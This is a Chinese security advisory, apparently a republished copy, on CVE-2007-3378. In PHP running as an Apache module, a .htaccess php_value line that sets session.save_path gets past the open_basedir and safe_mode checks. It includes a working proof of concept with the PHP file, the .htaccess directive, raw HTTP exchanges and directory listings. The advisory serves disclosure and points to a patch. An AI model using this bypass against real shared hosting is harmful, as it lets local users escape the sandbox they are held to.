安全传递:PHP处理.htaccess文件存在安全限制漏洞

不受影响系统:

PHP PHP 5.2.4

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 24661,25498

CVE(CAN) ID: CVE-2007-3378

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP在处理.htaccess文件中的配置时存在漏洞,本地攻击者可能利用此漏洞绕过PHP的某些安全限制。

如果将PHP用作Apache模块的话,就可以使用.htaccess文件中的指令更改配置设置。用户可以使用这些选项更改display_errors之类权限选项,但可以绕过不同函数中的safe_mode或open_basedir安全限制。例如,用户可以通过.htaccess设置session.save_path。在session_save_path()和ini_set()函数中对save_path检查了safe_mode和open_basedir,但在.htaccess中确可以绕过这个检查。

示例:

cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php <?php session_save_path("/inne"); session_start(); ?> cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is ´^]´. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html <br /> <b>Warning</b>: session_save_path() [<a href="https://www.linuxidc.com/´";function.session-save-path´>function.session-save-path&l t;/a>]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>2</b><br /> <br /> <b>Warning</b>: session_start() [<a href="https://www.linuxidc.com/´";function.session-start´>function.session-start</a> ]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>3</b><br /> <br /> <b>Fatal error</b>: session_start() [<a href="https://www.linuxidc.com/´";function.session-start´>function.session-start&l t;/a>]: Failed to initialize storage module: files (path: ) in <b>/www/cxib/stars.php</b> on line <b>3</b><br /> Connection closed by foreign host. cxib#  

因此用户无法在目录中创建会话,但可以创建.htaccess文件,因此可以在此写入:

- --- php_value session.save_path /inne - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php <?php session_start(); ?>  

无法通过ini_set()或session_save_path()设置session.save_path,但发送以下请求:

cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is ´^]´. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 root wheel 512 Feb 16 20:30 . drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 .. - -rw------- 1 www wheel 0 Feb 16 20:30 sess_45cae9284f2f8b7cb05ce96021c9bf4e  

这样就绕过了Open_basedir和safe_mode限制。error_log和其他一些函数中也存在同样的问题。

<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)

链接:

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wzwjys.html